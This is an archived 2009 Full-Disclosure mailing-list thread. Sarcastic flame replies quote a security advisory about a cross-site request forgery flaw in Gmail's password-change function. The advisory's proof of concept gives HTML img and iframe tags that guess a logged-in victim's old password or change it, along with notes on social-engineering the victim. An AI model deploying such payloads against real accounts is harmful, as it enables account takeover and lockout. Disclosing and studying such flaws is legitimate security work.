Ah, probably not. Your stringing together words to make sentences is what I'll regret reading. I'll continue to use my muscle milk and you'll continue to work your 9-5. The world turns once again!
On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache < security.musta...@gmail.com> wrote: > Mister Snarks, > > I've never been anything but who I purport to be, the humble upper > facial hair quadrant of a loquacious sysadmin. Low of birth, though > noble in aspiration, a student of history and of the many mustaches > who came before myself. > > You, young scholar, should be wary, though! Prospective employers do > make regular use of search engines, "googling" potential candidates to > gain insight into possible character flaws! > > True, your clean and jerk abilities as archived on the YouTube are > admirable, but acting a fool on security lists is something normally > reserved only for those in academia, who are markedly difficult if not > impossible to unseat from their comfortable chairs, as indisputably > underscored by the e-antics of this mutache's owner, and, of course, > Mssr. Schmehl. > > You'll come to regret your lack of anonymity, as your posts will live > on for eternity, much as I've came to regret my unfortunate > association with the unruly beardlike growth connecting to me from the > south, and my unavoidable tenuous connection with those objectionable > and uncouth sideburns. > > > Your humble servant, > I baffi di Valdis > > On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks <jstarks...@gmail.com> > wrote: > > I know, its insane. It is a new trend, though, just like people > registering > > gmail accounts just to flame and troll on FD! > > > > Its like, your credability like, goes like, ok you start like at 0, and > then > > like, it goes like to -1, and like, then even lower like. > > > > Absolutely genius. > > > > x0x0x0x0x0x0x0x0x0x > > > > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee <biz.mar...@gmail.com> wrote: > >> > >> This was 2 years well spent... NOT! > >> > >> Seriously what is with all these people popping up releasing advisories > >> that are absolute SHIT? Is it to try and get jobs or what? > >> > >> > >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories < > >> advisories at isecauditors.com> wrote: > >> > >> > ============================================= > >> > INTERNET SECURITY AUDITORS ALERT 2007-003 > >> > - Original release date: August 1st, 2007 > >> > - Last revised: January 11th, 2009 > >> > - Discovered by: Vicente Aguilera Diaz > >> > - Severity: 3/5 > >> > ============================================= > >> > > >> > I. VULNERABILITY > >> > ------------------------- > >> > CSRF vulnerability in GMail service > >> > > >> > II. BACKGROUND > >> > ------------------------- > >> > Gmail is Google's free webmail service. It comes with built-in Google > >> > search technology and over 2,600 megabytes of storage (and growing > >> > every day). You can keep all your important messages, files and > >> > pictures forever, use search to quickly and easily find anything > >> > you're looking for, and make sense of it all with a new way of viewing > >> > messages as part of conversations. > >> > > >> > III. DESCRIPTION > >> > ------------------------- > >> > Cross-Site Request Forgery, also known as one click attack or session > >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of > >> > malicious exploit of websites. Although this type of attack has > >> > similarities to cross-site scripting (XSS), cross-site scripting > >> > requires the attacker to inject unauthorized code into a website, > >> > while cross-site request forgery merely transmits unauthorized > >> > commands from a user the website trusts. > >> > > >> > GMail is vulnerable to CSRF attacks in the "Change Password" > >> > functionality. The only token for authenticate the user is a session > >> > cookie, and this cookie is sent automatically by the browser in every > >> > request. > >> > > >> > An attacker can create a page that includes requests to the "Change > >> > password" functionality of GMail and modify the passwords of the users > >> > who, being authenticated, visit the page of the attacker. > >> > > >> > The attack is facilitated since the "Change Password" request can be > >> > realized across the HTTP GET method instead of the POST method that is > >> > realized habitually across the "Change Password" form. > >> > > >> > IV. PROOF OF CONCEPT > >> > ------------------------- > >> > 1. An attacker create a web page "csrf-attack.html" that realize many > >> > HTTP GET requests to the "Change Password" functionality. > >> > > >> > For example, a password cracking of 3 attempts (see "OldPasswd" > >> > parameter): > >> > ... > >> > <img > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > <img > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > <img > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > ... > >> > > >> > or with hidden frames: > >> > ... > >> > <iframe > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > <iframe > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > <iframe > >> > src=" > >> > > >> > > https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save > >> > "> > >> > ... > >> > > >> > The attacker can use deliberately a weak new password (see "Passwd" > >> > and "PasswdAgain" parameters), this way he can know if the analysed > >> > password is correct without need to modify the password of the victim > >> > user. > >> > > >> > Using weak passwords the "Change Password" response is: > >> > - " The password you gave is incorrect. ", if the analysed password > >> > is not correct. > >> > - " We're sorry, but you've selected an insecure password. In order > >> > to protect the security of your account, please click "Password > >> > Strength" to get tips on choosing to safer password. ", if the > >> > analysed password is correct and the victim password is not modified. > >> > > >> > If the attacker want to modify the password of the victim user, the > >> > waited response message is: " Your new password has been saved - OK ". > >> > > >> > In any case, the attacker evades the restrictions imposed by the > >> > captcha of the authentication form. > >> > > >> > 2. A user authenticated in GMail visit the "csrf-attack.html" page > >> > controlled by the attacker. > >> > > >> > For example, the attacker sends a mail to the victim (a GMail account) > >> > and provokes that the victim visits his page (social engineering). So, > >> > the attacker insures himself that the victim is authenticated. > >> > > >> > 3. The password cracking is executed transparently to the victim. > >> > > >> > V. BUSINESS IMPACT > >> > ------------------------- > >> > - Selective DoS on users of the GMail service (changing user > password). > >> > - Possible access to the mail of other GMail users. > >> > > >> > VI. SYSTEMS AFFECTED > >> > ------------------------- > >> > Gmail service. > >> > > >> > VII. SOLUTION > >> > ------------------------- > >> > No solution provided by vendor. > >> > > >> > VIII. REFERENCES > >> > ------------------------- > >> > http://www.gmail.com > >> > > >> > IX. CREDITS > >> > ------------------------- > >> > This vulnerability has been discovered and reported by > >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com). > >> > > >> > X. REVISION HISTORY > >> > ------------------------- > >> > July 31, 2007: Initial release > >> > August 1, 2007: Fewer corrections. > >> > December 30, 2008: Last details. > >> > > >> > XI. DISCLOSURE TIMELINE > >> > ------------------------- > >> > July 30, 2007: Vulnerability acquired by > >> > Internet Security Auditors. > >> > August 1, 2007: Initial notification sent to the > >> > Google security team. > >> > August 1, 2007: Google security team request additional > >> > information. > >> > about and start review the vulnerability. > >> > August 13, 2007: Request information about the status. > >> > August 15, 2007: Google security team responds that they are still > >> > working on this. > >> > September 19, 2007: Request for the status. No response. > >> > November 26, 2007: Request for the status. No response. > >> > January 2, 2008: Request for the status. No response. > >> > January 4, 2008: Request for the status. No response. > >> > January 11, 2008: Request for the status. No response. > >> > January 15, 2008: Request for the status. Automated response. > >> > January 18, 2008: Google security team informs that don't expect > >> > behaviour to change in the short term giving > >> > the justification. > >> > We deconstruct those arguments as insufficient. > >> > No more responses. > >> > December 30, 2008: Request for the status. Confirmation from Google > >> > they won't change the consideration about this. > >> > January 11, 2009: Publication to Bugtraq. Rejected twice. > >> > No reasons. > >> > March 03, 2009: General publication for disclosure in other lists. > >> > > >> > XII. LEGAL NOTICES > >> > ------------------------- > >> > The information contained within this advisory is supplied "as-is" > >> > with no warranties or guarantees of fitness of use or otherwise. > >> > Internet Security Auditors accepts no responsibility for any damage > >> > caused by the use or misuse of this information. > >> > > >> > _______________________________________________ > >> > Full-Disclosure - We believe in it. > >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> > Hosted and sponsored by Secunia - http://secunia.com/ > >> > > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/